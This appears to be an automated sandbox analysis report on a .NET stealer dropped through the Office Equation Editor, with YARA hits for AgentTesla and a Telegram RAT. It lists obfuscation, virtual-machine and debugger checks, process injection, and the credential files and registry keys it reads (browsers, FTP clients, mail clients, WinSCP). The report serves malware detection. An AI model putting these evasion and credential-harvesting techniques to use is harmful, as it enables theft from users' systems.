                      Source: 5.2.godsawqop.exe.340000.0.unpack, ReadTargetFrameworkId.csBase64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
                      Source: 5.0.godsawqop.exe.340000.0.unpack, ReadTargetFrameworkId.csBase64 encoded string: 'MCuG7XUs38P6k4WdnTWI3IANa/sgVb7YGhbD75ZlqVzJB6xUpWr2V0s9Jj5+GNXr', 'i4nNrNYcW4k/GlGDwrHAx4ioVbST5Yvb6lMfzGT6KETSOeBNtqnuqj6YyPMmGH62', 'xG0LPJbgvTX95AxOgDC8xNrioLzel7bVSHjXBpcGDAkKQDJ2NLU0ll1cDptM5xoz', 'qXzECWWb3k/y0iiBy1/Qlh6P50QPGNrdKnkwfURW1FbtAT588B16q/jM9Iomo01s'
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

                      Data Obfuscation:

                      barindex
                      Binary or sample is protected by dotNetProtectorShow sources
                      Source: godsawqop.exeString found in binary or memory: dotNetProtector
                      Source: godsawqop.exe, 00000004.00000000.402764820.0000000000342000.00000020.00020000.sdmpString found in binary or memory: rset_ShowInTaskbarFindFirstCharRegularMagicNumberGetSerialNumberMethodRowReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderM_typeBuilderAssemblyBuilderM_assemblyBuilderGetYearMonthDayOrderArg_ArrayLengthsDifferlpBuffer_tmpOneCharBufferResourceManagerDebuggerFrameDescHelperSeqPointsHelperIComparerSingleRangeComparerFieldEqualityComparerByteEqualityComparerCreateProcessAsUserIsGenericParameterIsNativeWriterStringWriterget_IsPointerIRvaFileOffsetConverterBitConverterM_converterIsCasterSet_AssemblyResolverMemberMDInitializerGetTokenForFloorNotPermittedErrorCreateInstanceDefaultCtorSet_AMDesignatorGetDateSeparatorCheckSeparatorGet_ListSeparatorIEnumeratorGetEnumeratorTextElementEnumeratorGetILGenerator.ctor.cctordotNetProtectorIsStaticConstructorDefineConstructorget_IsConstructorCreateDecryptorIntPtrPropertyPtrIsLdstrHaveHouriz
                      Source: godsawqop.exeString found in binary or memory: dotNetProtector
                      Source: godsawqop.exe, 00000005.00000000.454206707.0000000000342000.00000020.00020000.sdmpString found in binary or memory: rset_ShowInTaskbarFindFirstCharRegularMagicNumberGetSerialNumberMethodRowReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderM_typeBuilderAssemblyBuilderM_assemblyBuilderGetYearMonthDayOrderArg_ArrayLengthsDifferlpBuffer_tmpOneCharBufferResourceManagerDebuggerFrameDescHelperSeqPointsHelperIComparerSingleRangeComparerFieldEqualityComparerByteEqualityComparerCreateProcessAsUserIsGenericParameterIsNativeWriterStringWriterget_IsPointerIRvaFileOffsetConverterBitConverterM_converterIsCasterSet_AssemblyResolverMemberMDInitializerGetTokenForFloorNotPermittedErrorCreateInstanceDefaultCtorSet_AMDesignatorGetDateSeparatorCheckSeparatorGet_ListSeparatorIEnumeratorGetEnumeratorTextElementEnumeratorGetILGenerator.ctor.cctordotNetProtectorIsStaticConstructorDefineConstructorget_IsConstructorCreateDecryptorIntPtrPropertyPtrIsLdstrHaveHouriz
                      Source: godsawqop.exe.2.drString found in binary or memory: dotNetProtector
                      Source: godsawqop.exe.2.drString found in binary or memory: rset_ShowInTaskbarFindFirstCharRegularMagicNumberGetSerialNumberMethodRowReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderM_typeBuilderAssemblyBuilderM_assemblyBuilderGetYearMonthDayOrderArg_ArrayLengthsDifferlpBuffer_tmpOneCharBufferResourceManagerDebuggerFrameDescHelperSeqPointsHelperIComparerSingleRangeComparerFieldEqualityComparerByteEqualityComparerCreateProcessAsUserIsGenericParameterIsNativeWriterStringWriterget_IsPointerIRvaFileOffsetConverterBitConverterM_converterIsCasterSet_AssemblyResolverMemberMDInitializerGetTokenForFloorNotPermittedErrorCreateInstanceDefaultCtorSet_AMDesignatorGetDateSeparatorCheckSeparatorGet_ListSeparatorIEnumeratorGetEnumeratorTextElementEnumeratorGetILGenerator.ctor.cctordotNetProtectorIsStaticConstructorDefineConstructorget_IsConstructorCreateDecryptorIntPtrPropertyPtrIsLdstrHaveHouriz
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00342B21 push edi; iretd
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_0034A81C push edx; ret
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00344BFC pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00347C63 push cs; iretd
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_002D88CB push es; retn 0040h
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_004FABDC push edi; iretw
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00505893 push ebp; retf
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_005051BD push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_0051A78A push edi; retf
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00655B65 push esi; ret
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_006A5B95 push edx; ret
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_00342B21 push edi; iretd
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_0034A81C push edx; ret
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_00344BFC pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 5_2_00347C63 push cs; iretd
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\godsawqop.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1212Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 1972Thread sleep time: -420000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 2812Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 2812Thread sleep time: -150000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 2624Thread sleep count: 9656 > 30
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 2624Thread sleep count: 83 > 30
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exe TID: 2812Thread sleep count: 110 > 30
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00310FC7 rdtsc
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeWindow / User API: threadDelayed 9656
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeThread delayed: delay time: 30000

                      Anti Debugging:

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_0080BAA4 CheckRemoteDebuggerPresent,
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeCode function: 4_2_00310FC7 rdtsc
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeMemory written: C:\Users\user\AppData\Roaming\godsawqop.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeProcess created: C:\Users\user\AppData\Roaming\godsawqop.exe C:\Users\user\AppData\Roaming\godsawqop.exe
                      Source: godsawqop.exe, 00000005.00000002.724489859.0000000000BD0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: godsawqop.exe, 00000005.00000002.724489859.0000000000BD0000.00000002.00020000.sdmpBinary or memory string: !Progman
                      Source: godsawqop.exe, 00000005.00000002.724489859.0000000000BD0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeQueries volume information: C:\Users\user\AppData\Roaming\godsawqop.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeQueries volume information: C:\Users\user\AppData\Roaming\godsawqop.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: godsawqop.exe PID: 2236, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 4.2.godsawqop.exe.32ea110.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.godsawqop.exe.3320330.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.godsawqop.exe.3320330.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.godsawqop.exe.32ea110.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.godsawqop.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: godsawqop.exe PID: 2692, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: godsawqop.exe PID: 2236, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\godsawqop.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: godsawqop.exe PID: 2236, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: godsawqop.exe PID: 2236, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 4.2.godsawqop.exe.32ea110.1.unpack, type: UNPACKEDPE
